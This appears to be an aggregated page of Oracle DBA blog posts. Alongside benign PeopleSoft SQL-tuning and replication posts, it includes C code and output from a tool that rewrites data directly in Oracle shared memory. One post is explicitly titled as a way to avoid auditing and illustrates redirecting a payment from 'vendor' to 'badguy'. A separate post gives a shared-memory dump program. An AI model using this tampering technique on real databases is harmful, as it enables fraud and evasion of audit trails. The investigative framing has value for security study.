int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 03:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, and the data on disk remained untouched.  (verified by flushing the buffer cache and forcing a re-read from disk)


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

Direct update of Oracle data in SGA to avoid audit.

ContractOracle - Thu, 2014-07-10 05:42
Vendors sell some rather expensive software for auditing Oracle databases, and for coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  

It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.

Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses etc.

PDB1@ORCL> create table payment_batch (payee char(6));

Table created.

PDB1@ORCL> insert into payment_batch values ('vendor');

1 row created.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

PDB1@ORCL> commit;

Commit complete.

PDB1@ORCL> alter system flush buffer_cache;

System altered.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

You can see that in the middle of this transaction it was possible to modify the in-flight data stored in SGA, which was then committed to disk.  This was done via a direct update to SGA records on the DB server.
Categories: DBA Blogs

Introducing the Analytic Keep Clause for Effective-Dated/Sequence Queries in PeopleSoft

David Kurtz - Wed, 2014-07-09 13:46
Those of us who work with PeopleSoft, and especially the HCM product, are all too familiar with the concept of effective-dated data, and the need to find data that was effective at a particular date.  PeopleSoft products have always made extensive use of correlated sub-queries to determine the required rows from an effective-dated record.

The JOB record is at the heart of HCM. It is both effective-dated and effective-sequenced. I will use it for the demonstrations in this article. I am going to suggest an alternative, although Oracle-specific, SQL construction.

Let's start by looking at the job data for an employee in the demo database. Employee KF0018 has 17 rows of data across two concurrent jobs.  The question I am going to ask is "What was the annual salary for this employee on 11 February 1995?"  Therefore, I am interested in the rows marked below with asterisks.
column annual_rt format 999,999
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM ps_job j
WHERE j.emplid = 'KF0018'
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 12-JUN-83 0 HIR 13000 FRF 120,000
KF0018 0 01-JAN-84 0 PAY 13000 FRF 123,600
KF0018 0 01-JAN-85 0 PAY 13000 FRF 127,308
KF0018 0 01-JAN-86 0 PAY 13000 FRF 131,764
KF0018 0 01-JAN-87 0 PAY 13000 FRF 136,376
KF0018 0 01-JAN-88 0 PAY 13000 FRF 140,467
KF0018 0 01-JAN-89 0 PAY 13000 FRF 147,490
KF0018 0 22-JAN-95 0 PRO 13000 FRF 147,490
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239 *
KF0018 0 22-JAN-96 0 PAY 13000 FRF 318,575
KF0018 0 01-JAN-98 0 PAY 13000 FRF 346,156
KF0018 0 01-JAN-00 0 DTA 13000 FRF 346,156
KF0018 0 01-JAN-02 0 PAY 13000 EUR 52,771
KF0018 1 01-NOV-89 0 ASG 21300 GBP 22,440
KF0018 1 31-DEC-93 0 ASC 21300 GBP 22,440
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440 *
KF0018 1 31-DEC-95 0 ASC 10000 GBP 22,440

I will set statistics level to ALL so I can obtain detailed information about how the SQL statements execute:
ALTER SESSION SET statistics_level = ALL;

I extracted the execution plans and execution statistics with the following command
select * from table(dbms_xplan.display_cursor(null,null,'IOSTATS')) 

Typical PeopleSoft Platform Agnostic Construction

This is the usual way to construct the query in PeopleSoft. It is also valid on all database platforms supported by PeopleSoft, not just Oracle.
SELECT  emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM ps_job j
WHERE j.effdt = (
SELECT MAX (j1.effdt) FROM ps_job j1
WHERE j1.emplid = j.emplid
AND j1.empl_rcd = j.empl_rcd
AND j1.effdt <= TO_DATE('19950211','YYYYMMDD'))
AND j.effseq = (
SELECT MAX (j2.effseq) FROM ps_job j2
WHERE j2.emplid = j.emplid
AND j2.empl_rcd = j.empl_rcd
AND j2.effdt = j.effdt)
AND j.emplid = 'KF0018'
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440

This required three accesses of indexes on the PS_JOB table, and two accesses of the table, using 26 consistent reads.
Plan hash value: 2299825310
----------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | Reads |
----------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 26 | 2 |
| 1 | SORT ORDER BY | | 1 | 1 | 2 |00:00:00.01 | 26 | 2 |
| 2 | NESTED LOOPS | | 1 | 1 | 2 |00:00:00.01 | 26 | 2 |
| 3 | NESTED LOOPS | | 1 | 1 | 3 |00:00:00.01 | 21 | 2 |
| 4 | VIEW | VW_SQ_1 | 1 | 1 | 2 |00:00:00.01 | 14 | 2 |
|* 5 | FILTER | | 1 | | 2 |00:00:00.01 | 14 | 2 |
| 6 | HASH GROUP BY | | 1 | 1 | 2 |00:00:00.01 | 14 | 2 |
| 7 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 14 | 2 |
|* 8 | INDEX RANGE SCAN | PS_JOB | 1 | 1 | 12 |00:00:00.01 | 2 | 2 |
| 9 | TABLE ACCESS BY INDEX ROWID | PS_JOB | 2 | 1 | 3 |00:00:00.01 | 7 | 0 |
|* 10 | INDEX RANGE SCAN | PSAJOB | 2 | 1 | 3 |00:00:00.01 | 4 | 0 |
|* 11 | VIEW PUSHED PREDICATE | VW_SQ_2 | 3 | 1 | 2 |00:00:00.01 | 5 | 0 |
|* 12 | FILTER | | 3 | | 3 |00:00:00.01 | 5 | 0 |
| 13 | SORT AGGREGATE | | 3 | 1 | 3 |00:00:00.01 | 5 | 0 |
|* 14 | FILTER | | 3 | | 5 |00:00:00.01 | 5 | 0 |
|* 15 | INDEX RANGE SCAN | PSAJOB | 3 | 1 | 5 |00:00:00.01 | 5 | 0 |
----------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

5 - filter("J1"."EMPLID"='KF0018')
8 - access("J1"."EMPLID"='KF0018' AND "J1"."SYS_NC00164$">=HEXTORAW('883CFDF4FEF8FEFAFF') )
filter(SYS_OP_UNDESCEND("J1"."SYS_NC00164$")<=TO_DATE(' 1995-02-11 00:00:00', 'syyyy-mm-dd
hh24:mi:ss'))
10 - access("J"."EMPLID"='KF0018' AND "ITEM_2"="J"."EMPL_RCD" AND
"J"."SYS_NC00164$"=SYS_OP_DESCEND("MAX(J1.EFFDT)"))
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")="MAX(J1.EFFDT)")
11 - filter(SYS_OP_UNDESCEND("J"."SYS_NC00165$")="MAX(J2.EFFSEQ)")
12 - filter(COUNT(*)>0)
14 - filter('KF0018'="J"."EMPLID")
15 - access("J2"."EMPLID"='KF0018' AND "J2"."EMPL_RCD"="J"."EMPL_RCD" AND
"J2"."SYS_NC00164$"=SYS_OP_DESCEND(SYS_OP_UNDESCEND("J"."SYS_NC00164$")))
filter(SYS_OP_UNDESCEND("J2"."SYS_NC00164$")=SYS_OP_UNDESCEND("J"."SYS_NC00164$"))

This construction is also the reason you are required to set _UNNEST_SUBQUERY=FALSE on all PeopleSoft systems.
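
For reference, here is a hedged sketch of how such a hidden parameter is typically set, assuming an spfile-managed instance; only change underscore parameters where the PeopleSoft platform documentation or Oracle Support direct you to.

-- Hidden parameters must be quoted; the change takes effect at the next instance restart.
ALTER SYSTEM SET "_unnest_subquery" = FALSE SCOPE = SPFILE;
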
Analytic Function and In-Line View/Sub-query Factor

I have seen people use a combination of analytic functions and in-line views to avoid having to use the correlated sub-query construction. This has been possible since Oracle 9i.
WITH X AS (
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
, ROW_NUMBER() OVER (PARTITION BY emplid, empl_rcd 
ORDER BY effdt DESC, effseq DESC) myrowseq
FROM ps_job j
WHERE j.effdt <= TO_DATE('19950211','YYYYMMDD')
AND j.emplid = 'KF0018'
)
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM x
WHERE myrowseq = 1
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440

We get the same result, but now the index is scanned just once and we only need 14 consistent reads, so it produces a significant improvement. However, it still includes a sort operation in addition to the window function. We have to create a sequence number field in the in-line view and filter by that in the final query.
Plan hash value: 1316906785
---------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
---------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 14 |
| 1 | SORT ORDER BY | | 1 | 1 | 2 |00:00:00.01 | 14 |
|* 2 | VIEW | | 1 | 1 | 2 |00:00:00.01 | 14 |
|* 3 | WINDOW NOSORT | | 1 | 1 | 12 |00:00:00.01 | 14 |
| 4 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 14 |
|* 5 | INDEX RANGE SCAN | PSAJOB | 1 | 1 | 12 |00:00:00.01 | 2 |
---------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

2 - filter("MYROWSEQ"=1)
3 - filter(ROW_NUMBER() OVER ( PARTITION BY "EMPLID","EMPL_RCD" ORDER BY
"J"."SYS_NC00164$","J"."SYS_NC00165$")<=1)
5 - access("J"."EMPLID"='KF0018' AND "J"."SYS_NC00164$">=HEXTORAW('883CFDF4FEF8FEFAFF')
)
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")<=TO_DATE(' 1995-02-11 00:00:00',
'syyyy-mm-dd hh24:mi:ss'))


Analytic Function Keep Clause

This form of the analytic functions is documented for the first time in 12c, but is available in 10g (my thanks to Tony Hasler for introducing me to it). It works by effectively keeping a running maximum value of the columns in the order by clause within each group.
SELECT emplid, empl_rcd
, MAX(effdt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS effdt
, MAX(effseq) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS effseq
, MAX(action) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS action
, MAX(deptid) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS deptid
, MAX(currency_cd) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS currency_cd
, MAX(annual_rt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS annual_rt
FROM ps_job j
WHERE j.effdt <= TO_DATE('19950211','YYYYMMDD')
AND j.emplid = 'KF0018'
GROUP BY emplid, empl_rcd
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440

Although this construction uses an additional consistent read, it has the advantage of not using either an inline view or a window function and does not sort the data.
Plan hash value: 1550496807
-------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
-------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 15 |
| 1 | SORT GROUP BY NOSORT | | 1 | 1 | 2 |00:00:00.01 | 15 |
| 2 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 15 |
|* 3 | INDEX RANGE SCAN | PS_JOB | 1 | 1 | 12 |00:00:00.01 | 3 |
-------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

3 - access("J"."EMPLID"='KF0018' AND "J"."SYS_NC00164$">=HEXTORAW('883CFDF3FEF8FEFAFF'
) )
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")<=TO_DATE(' 1995-02-12 00:00:00',
'syyyy-mm-dd hh24:mi:ss'))

I think this construction could be useful in PeopleSoft.  At first glance the SQL appears more complicated, but in this example it removed two correlated sub-queries.

Using Analytic Functions in PS/Query

Of course you can code it anywhere you can simply enter SQL as text.  However, it also has the advantage over the other analytic function construction that it can be coded in the PS/Query tool.  The analytic functions in the select clause should be created in PS/Query expressions with the aggregate expression checkbox ticked.

[Screenshot: Analytic 'Keep' function in an aggregate expression, in the Windows client version of PS/Query]

The analytic functions can be selected in PS/Query, and their lengths and titles can be tidied up.

[Screenshot: PS/Query with analytic 'Keep' functions]
This is the resulting SQL, which is the same as before (with row-level security added by PS/Query) and produces the same results.
SELECT A.EMPLID, A.EMPL_RCD, MAX(effdt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
, MAX(effseq) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(action) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(deptid) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(currency_cd) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(annual_rt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
FROM PS_JOB A, PS_EMPLMT_SRCH_QRY A1
WHERE ( A.EMPLID = A1.EMPLID
AND A.EMPL_RCD = A1.EMPL_RCD
AND A1.OPRID = 'PS'
AND ( A.EFFDT <= TO_DATE('1995-02-11','YYYY-MM-DD')
AND A.EMPLID = 'KF0018' ) )
GROUP BY A.EMPLID, A.EMPL_RCD

GoldenGate Active-Active Database Replication with Conflict Detection and Resolution

VitalSoftTech - Tue, 2014-07-08 14:46
Bi-Directional Replication, also known as Active-Active Replication, is a configuration where both databases are used as an active site and applications perform DML/DDL activities on both databases. The OGG processes are configured to replicate the transaction data of both source databases back and forth to each other. 1. Advantages Bi-directional GoldenGate Replication can be […]
Categories: DBA Blogs

C program to dump shared memory segments to disk on Linux.

ContractOracle - Tue, 2014-07-08 02:26
The following program was written to help investigate Oracle database shared memory on Linux.  It dumps the contents of existing shared memory segments to files on disk.  Note that it won't work against Oracle 11g and 12c databases as they use mmap instead of shmat for managing shared memory.  A sample program for reading from 11g and 12c is here (mmap example).

Compile it using "gcc -o shared shared.c".  It is free for anyone to copy or modify as they wish, but I do not guarantee the functionality.

Check the format of the include listings below as I had to remove hashes and greater-than/less-than symbols to keep blogger happy.

#include <stdio.h>
#include <stdlib.h>
#include <sys/shm.h>


int main (int argc, char *argv[]) {
    int maxkey, id, shmid = 0;
    struct shm_info shm_info;
    struct shmid_ds shmds;
    void * shared_data;
    FILE * outfile;
    
    maxkey = shmctl(0, SHM_INFO, (void *) &shm_info);
    for(id = 0; id <= maxkey; id++) {
        shmid = shmctl(id, SHM_STAT, &shmds);
        char shmidchar[16];
        snprintf(shmidchar, sizeof(shmidchar), "%d", shmid);
        if (shmid < 0)
            continue;
        if(shmds.shm_segsz > 0) {
            printf("Shared memory segment %s found.\n",shmidchar);
            
            shared_data = shmat(shmid, NULL, 0666);
            if(shared_data != (void *) -1) {   /* shmat returns (void *) -1 on failure, not NULL */
                outfile = fopen(shmidchar, "wb");
                if(outfile == NULL) {
                    printf("Could not open file %s for writing.", shmidchar);
                }
                else {
                    fwrite(shared_data, shmds.shm_segsz, 1, outfile);
                    fclose(outfile);
                    
                    printf("Dumped to file %s\n\n", shmidchar);
                }
            }
        }
    }
}



Categories: DBA Blogs

George EP Box

Greg Pavlik - Mon, 2014-07-07 16:22
"Essentially, all models are wrong. Some models are useful."
